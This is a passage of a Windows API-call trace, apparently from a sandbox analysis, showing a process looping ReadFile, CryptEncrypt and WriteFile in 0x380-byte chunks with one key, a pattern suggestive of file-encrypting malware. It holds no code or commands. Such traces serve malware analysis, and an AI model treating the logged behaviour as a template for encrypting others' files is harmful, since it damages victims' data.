lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.061] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.061] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.061] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.061] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.061] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.061] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.061] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.061] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.061] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.061] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.061] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.061] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.061] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.061] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.062] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.062] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.062] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.062] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.062] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.062] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.062] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.062] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.062] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.062] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.062] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.062] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.062] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.062] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.062] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.063] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.063] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.063] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.063] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.063] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.063] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.063] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.063] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.063] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.063] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.063] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.063] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.063] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.064] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.064] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.064] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.064] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.064] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.064] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.064] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.064] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.064] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.065] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.066] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.066] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.066] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.066] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.066] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.066] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.066] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.066] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.066] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.066] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.066] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.067] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.067] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.067] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.067] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.067] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.067] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.067] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.067] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.067] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.067] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.067] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.067] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.067] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.067] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.068] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.068] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.068] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.068] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.068] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.068] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.068] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.068] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.068] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.068] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.068] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.068] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.069] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.069] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.069] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.069] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.069] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.069] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.069] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.069] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.069] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.069] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.069] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.070] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.070] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, 